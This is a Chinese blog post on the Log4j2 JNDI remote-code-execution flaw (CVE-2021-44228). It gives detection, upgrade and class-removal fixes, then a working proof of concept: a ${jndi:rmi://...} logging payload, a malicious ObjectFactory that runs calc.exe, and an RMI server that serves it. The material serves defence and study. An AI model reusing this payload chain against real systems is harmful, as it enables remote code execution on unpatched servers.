Apache log4j2 远程命令执行漏洞复现及修复方案

已于 2022-02-14 21:06:26 修改
阅读量6.4k 收藏 3
点赞数
分类专栏: 网络安全 文章标签: apache 安全 web安全
于 2021-12-14 22:44:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/next_second/article/details/121941830
版权

2021-12-27 重要更新:

根据官网消息,2.16.0和2.17.0版本包暴露了新的漏洞(CVE-2021-45105)和(CVE-2021-44832)。建议升级到2.17.1版本。

2021-12-18重要更新:

根据Apache Log4j2官网信息,针对漏洞CVE-2021-44228的临时规避方案,除了删除class之外,其他设置formatMsgNoLookups等环境变量的方案,在特定情况下会失效。建议升级到2.16.0版本,或者删除class文件。

另外,2.16.0版本仍存在漏洞CVE-2021-45105,当前官网给的方案是升级到2.17.0,并时刻关注官网信息。

参考:2012-12-18官网信息

2012-12-18官网信息

附:从jar包中删除class文件的方法:

注意:

  • 如果容器化部署,容器实例重启后操作会复原,需要重新操作。
  • 实际执行需要关注文件属主和权限等安全属性。

1. 非SpringBoot的jar包,直接删除log4j-core-*.jar中class文件

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

2. SpringBoot的jar包,需要解压出log4j-core*.jar,删除class文件后重新打包

2.1 使用zip和unzip命令
# 以Demo.jar为例
## 解压获得log4j-core*.jar
unzip -o Demo.jar BOOT-INF/lib/log4j-core*.jar
## 删除class
zip -q -d BOOT-INF/lib/log4j-core*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
## 重新打包
zip -r -0 Demo.jar BOOT-INF/
## 检查jar包中的log4j-core*.jar包是否已经更新
unzip -l Demo.jar | grep log4j-core
## 删除临时文件
rm -rf BOOT-INF/
## 检查下jar包是否可以正常启动
java -jar Demo.jar
2.2 使用jar命令(需要jdk)
# 以Demo.jar为例

## 创建临时目录
rm -rf tmp && mkdir tmp && cd tmp
## 解压
jar -xf ../Demo.jar
## 删除class
zip -q -d BOOT-INF/lib/log4j-core*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
## 重新打包
jar -cfm0 Demo.jar ./META-INF/MANIFEST.MF ./
## 删除临时文件
rm -rf BOOT-INF/ META-INF/ org/
## 检查下jar包是否可以正常启动
java -jar Demo.jar

1. 漏洞信息

漏洞软件: Apache Log4j2

漏洞编号:CVE-2021-44228

漏洞描述:Apache Log4j2 远程命令执行

时间:2021-11-26

漏洞详情:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

漏洞影响范围版本:2.0.beta9 to 2.14.1

2. 排查指导

查看引用了 log4j-apilog4j-core 两个jar包,如maven依赖:

        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>

3. 修复方案

升级到 2.16.0 版本

4. 缓解措施(已失效)

2.10 <= 版本 <= 2.14.1

以下方法任选一种:

  1. 添加jvm参数:-Dlog4j2.formatMsgNoLookups=true
  2. 在应用classpath下添加文件log4j2.component.properties,添加配置log4j2.formatMsgNoLookups=true
  3. 添加系统环境变量 LOG4J_FORMAT_MSG_NO_LOOKUPS=true

2.0-beta9 <= 版本 < 2.10

在classpath中移除JndiLookup

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

参考官网信息:

官网信息

参考信息

1. Apache Log4j2 官网漏洞信息

2. 缓解措施,环境变量名称应该为LOG4J_FORMAT_MSG_NO_LOOKUPS

3. Apache Log4j2 github地址

4. 复现代码

漏洞信息:

复现代码

1. pom依赖

    <dependencies>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>
    </dependencies>

2. 被攻击代码

package com.example.log4j2demo;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4j2Demo {
    private static final Logger LOGGER = LogManager.getLogger(Log4j2Demo.class);


    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        System.out.println("begin of print log...");

        String logContent = "${jndi:rmi://127.0.0.1:1099/evil}";
        // 模拟另外一台机器运行恶意代码
//        String logContent = "${jndi:rmi://192.168.3.57:1099/evil}";
        LOGGER.error("hello, {}", logContent);
        System.out.println("end of print log...");
    }
}

2. 恶意代码(以启动计算器为例)

package com.example.log4j2demo;

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.Hashtable;

public class EvilObj implements ObjectFactory {

    static {
        System.out.println("begin to run EvilObj static code...");

        try {
            Process p = Runtime.getRuntime().exec(new String[]{"cmd", "/c", "calc.exe"});
            InputStream inputStream = p.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }
            p.waitFor();
            inputStream.close();
            reader.close();
            p.destroy();

        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        System.out.println("getObjectInstance of EvilObj ...");
        return null;
    }

}

4. RMIServer

package com.example.log4j2demo;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {
    public static void main(String[] args) {
        try {
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();
            System.out.println("Create RMI registry on port 1099...");

            String className = "com.example.log4j2demo.EvilObj";
            Reference reference = new Reference(className, className, className);
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            registry.bind("evil", referenceWrapper);
            System.out.println("registry bind ...");

        } catch (Exception e) {
            e.printStackTrace();

        }
    }
}
杨小熊的笔记
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Log4j 漏洞修复和临时补救方法
12-14 3772
1.2 漏洞评级及影响版本 Apache Log4j 远程代码执行漏洞 严重 影响的版本范围:Apache Log4j 2.x <= 2.14.1 2.log4j2 漏洞简单演示 创建maven工程 引入jar包依赖 <dependencies> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifa
Apache log4j2远程代码执行漏洞复现
世间繁华梦一出
12-11 9842
Apache log4j2 远程代码执行漏洞复现漏洞描述漏洞影响范围漏洞复现步骤:深度利用——反弹shell防御措施 漏洞描述 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的请求包,最终出发远程代码执行。该漏洞实际上是组件解析缺陷导致的。 漏洞影响范围 2.0 <= Apache
使用云效Codeup10分钟紧急修复Apache Log4j2漏洞
最新发布
qq_53058639的博客
05-15 658
简介:2021年12月10日,国家信息安全漏洞共享平台(CNVD)收录了Apache Log4j2远程代码执行漏洞(CNVD-2021-95914),此漏洞是一个基于Java的日志记录工具,为Log4j的升级。作为目前最优秀的Java日志框架之一,被大量用于业务系统开发。早在2021年11月24日阿里巴巴云安全团队就报告了该漏洞,为了帮助大家更快的识别漏洞,避免受到潜在的攻击,云效技术团队提供了针对该漏洞的处理方案
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2700
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
Apache Log4j2远程代码执行漏洞复现
weixin_42345596的博客
12-10 8221
漏洞原理 log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。 影响版本 Log4j2.x<=2.14.1 漏洞复现 漏洞分析的可以参考逐日实验室的这篇:https://mp.weixin.qq.com/s/l7iclJRegADs3oiEdcgAvQ 准备环境 把受影响的jar包拖进随手创建的一个java项目,这里部署jar包步骤就不写了,网上一搜傻瓜式教程都有。 攻击机环境搭建,这里我用的vps(师兄的,因为我的是Windows。)jdk版本最好&
Apache Log4j2漏洞修复
水布天
12-17 3799
Apache Log4j2漏洞修复1 背景2 影响范围3 检测4 处理4.1 升级处理4.1.1 下载4.1.2 修复4.1.3 验证4.2 紧急处理5 参考 1 背景 2021年12月17日,Apache Log4j2 绝对是众多 Java 程序员提到的高频词之一:由于 Apache Log4j2 引发的严重安全漏洞,令一大批安全人员深夜修 Bug、发补丁。此次漏洞更是因为其触发简单、攻击难度低、影响人群广泛等特点,被许多媒体形容为“核弹级”漏洞。本文主要是针对漏洞修复的处理过程。 漏洞名词: CVE-2
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
Log4J2远程代码执行漏洞修复20211210.rar
12-13
Log4J2远程代码执行漏洞修复详解》 在IT安全领域,Log4J2远程代码执行漏洞(CVE-2021-44228)引起了广泛关注。此漏洞影响了全球无数使用Java日志框架Log4J2的应用程序,其严重性在于它允许攻击者通过注入特定的...
Apache Log4j2 远程代码执行漏洞修复步骤
飞一站的博客
12-10 2952
目录 Apache Log4j2 远程代码执行漏洞修复步骤 漏洞说明 修复步骤 1、下载源码zip包到本地 2、解压到本地 3、用IDEA打开项目 4、执行Maven Deploy,将log4j2修复的版本包安装到Nexus 5、修改项目中的pom.xml 6、测试验证 Apache Log4j2 远程代码执行漏洞修复步骤 漏洞说明 参考链接:Apache Log4j2 远程代码执行漏洞分析 - 安全客,安全资讯平台 Apache Log4j2是一个基于Java的日志记录工具。由于
Log4j2漏洞复现
热门推荐
weixin_51519028的博客
08-12 1万+
Apache Log4j2Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
Log4j2远程命令执行(CVE-2021-44228)
weixin_48817799的博客
01-25 1086
Log4j2远程命令执行(CVE-2021-44228) 前言一、vulfocus靶场二、复现步骤1.靶场如下2.点击抓包 前言 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 一、vulfocus靶场 http://vulfocus.io.
Apache Log4j2 远程代码执行漏洞修复
沛哥儿的专栏
12-27 251
近日国家信息安全漏洞共享平台(CNVD)收录了Apache Log4j2远程代码执行漏洞,通用漏洞编号CNVD-2021-95914。 Apache Log4j2是一款Java日志框架,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置。漏洞等级为:高危。 目前受影响范围如下: Apache Log4j 2.x < 2.15.0-rc2 建议使用相关组件的开发者进行自查,发现存在该漏洞后及时按照以下方案进行处置:...
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 8095
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
复现Apache Log4j2 远程代码执行漏洞
趣学程序
12-14 869
Apache Log4j2 远程代码执行漏洞 漏洞描述 Apache Log4j是Apache的一个开源项目,Apache log4j2是Log4j的升级版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 漏洞影响版本: 2.0 <= Apache Log4j 2 <= log4j-2.15.0-rc1 复现 仅个人学习总结 效果 MyServer.java package server;
Log4j2漏洞修复
derstsea的专栏
12-14 1万+
一、漏洞说明 Apache Log4j2是一个基于Java的日志记录工具。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。 漏洞适用版本为 2.0 <= Apache log4j2 <= 2.14.1,只需检测Java应用是否引入 log4j-api , log4j-core 两个j
apache log4j2远程代码执行漏洞检测工具
08-31
Apache Log4j2远程代码执行漏洞是一种影响Apache Log4j2日志记录库的严重安全漏洞。该漏洞允许攻击者通过发送特制的网络请求,远程执行任意代码,导致服务器完全被控制。 为了帮助检测这个漏洞,一些安全公司和社区为用户提供了相关工具。这些工具可以扫描用户的服务器和应用程序,检测是否受到Apache Log4j2远程代码执行漏洞的威胁。 这些工具通常会发送特定的请求来触发漏洞,并检查服务器的日志文件或响应,以确定是否存在漏洞。如果漏洞存在,工具将提供警告或报告,并建议相应的修复措施。 除了工具之外,用户还可以手动检查漏洞。他们可以通过编辑Log4j2的配置文件,将关键性日志记录功能设置为丢失或关闭。关闭该功能可以阻止攻击者利用漏洞,但也可能导致一些日志记录功能的失效。 为了更好地保护服务器和应用程序,用户应该尽快更新Apache Log4j2到最新版本。此外,他们还应该保持注意,及时关注安全更新和公告,并及时采取相应措施。 总之,Apache Log4j2远程代码执行漏洞检测工具是一种帮助用户发现漏洞并提供修复建议的工具。用户可以使用这些工具进行定期扫描,发现并处理潜在的漏洞,以提高系统的安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值